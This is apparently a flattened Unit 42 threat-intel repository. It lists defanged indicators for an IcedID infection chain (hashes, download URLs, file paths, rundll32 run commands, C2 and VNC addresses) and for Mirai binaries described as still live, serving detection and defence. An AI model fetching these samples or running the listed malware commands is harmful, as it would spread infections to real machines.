IcedID installer 25 | 26 | - SHA256 hash: e1d2c95eda751901a4bdae7ba381b85f5d7965b05afe245b5cbaccce9ecfb0bc 27 | - File size: 196,984 bytes 28 | - File location: hxxps://associazionedignita[.]it/wp-content/uploads/2023/06/r.dll 29 | - File location: C:\Users\[username]\AppData\Roaming\z.dll 30 | - File type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows 31 | - File description: 64-bit Installer DLL for IcedID 32 | - Run method: rundll32.exe [filename], vcab /k chokopai723 33 | - Note: The PowerShell script appends 750 MB to 950 MB of null bytes to the file when saved to disk. 34 | This results in an inflated DLL with a different file size/hash saved to disk for each infection. 35 | 36 | - SHA256 hash: e6d487e341ad86db6723895ede248c6d356b9b6471b43cd789bcc27ca06945fc 37 | - File size: 552,212 bytes 38 | - File location: hxxp://podiumstrtss[.]com/ 39 | - File type: gzip compressed data, was "Light.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3601146 40 | - File description: Gzip binary retrieved by above IcedID installer 41 | 42 | - SHA256 hash: 332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953 43 | - File size: 354,474 bytes 44 | - File location: C:\Users\[username]\AppData\Roaming\NationUniform\license.dat 45 | - File type: data 46 | - File description: data binary needed to run persistent IcedID DLL 47 | 48 | - SHA256 hash: c4ea6aec4f71e0a39407bdf76f00d3e6bcce95f01bef35fada84717b3cf6dc1c 49 | - File size: 196,984 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\[username]\udagqoaw3.dll 51 | - File type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows 52 | - File description: 64-bit persistent DLL for IcedID 53 | - Run method: rundll32.exe [filename],init --bifa="[path to license.dat]" 54 | 55 | TRAFFIC GENERATED BY .PS1 SCRIPT: 56 | 57 | - 81.177.140[.]194 port 443 - hxxps://9sta9rt4[.]store/?status=start&av= 58 | - 77.111.240[.]213 port 
443 - hxxps://associazionedignita[.]it/wp-content/uploads/2023/06/r.dll 59 | - 81.177.140[.]194 port 443 - hxxp://9sta9rt4[.]store/?status=install 60 | 61 | ICEDID INSTALLER RETRIEVES GZIP BINARY 62 | 63 | - 172.67.140[.]91 port 80 - podiumstrtss[.]com - GET / HTTP/1.1 64 | 65 | POST-INFECTION ICEDID C2: 66 | 67 | - 193.109.120[.]27 port 443 - smakizelkopp[.]com - HTTPS traffic 68 | - 128.199.151[.]179 port 443 - pokerstorstool[.]com - HTTPS traffic 69 | 70 | BACKCONNECT AND KEYHOLE VNC TRAFFIC: 71 | 72 | - 137.184.172[.]23 port 443 - TCP traffic for BackConnect and Keyhole VNC 73 | -------------------------------------------------------------------------------- /2023-08-10-moved-to-new-Github-repository.txt: -------------------------------------------------------------------------------- 1 | New threat intel data from Palo Alto Networks Unit 42 for our Timely Threat Intelligence (TTI) posts on social media will be posted to the following Github repository: 2 | 3 | - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/tree/main 4 | -------------------------------------------------------------------------------- /Mirai_updated_F5: -------------------------------------------------------------------------------- 1 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm5 - 76de9dc7d6aedfab1062ad2a739e97a4e58773c41e37aa732861ac4ead745da7 2 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm6 - ac484d4a5bd7d470d4345f167ff9c9e79f2bee949460948989a7f20e5e3181c4 3 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm7- 1ff02d986dc1f18a65d133786eba16ee7c614e9dbdd3fbc78129ec0918633e8a 4 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm - a0f32b9bb1c45412bf10f87e2344cd9fff5b405032d1e1be7fb92922c0918ffd 5 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.m68k - 14303039cfd1b41c90e767cf3f549ac8854f659e13db4a1d0cf93c632cc43612 6 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.mips - 
ff17da93817543ac3d8fa8dc150ceaafd03ad89bb4a4218dfa8da4cbd21037bd 7 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.mpsl - 32b471d5c1e28126f09ed7516cce79653cb2e316009f8e213194f436823cd227 8 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.ppc - 9eebc34f58c4bd09c242214a8d6ac26e51367d0d2d1b862d79d7ac84a6952148 9 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.sh4 - 6364dc208073b4e5194741ee5a0f53435d0550e640e85368835a1e1118fcc92e 10 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.x86 - 64a8522dcd5007323bdd1d4e255029c6b9ba47535cb3a668894cf504e3e5c043 11 | 12 | Samples are still live at the time of writing. 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # tweets 2 | This repository contains files associated with tweets from the @Unit42_Intel handle on Twitter. 3 | 4 | 5 | After 2023-08-09, all Github posts supporting our Timely Threat Intelligence Program to social media channels are on the following Github repository: 6 | 7 | https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/tree/main 8 | --------------------------------------------------------------------------------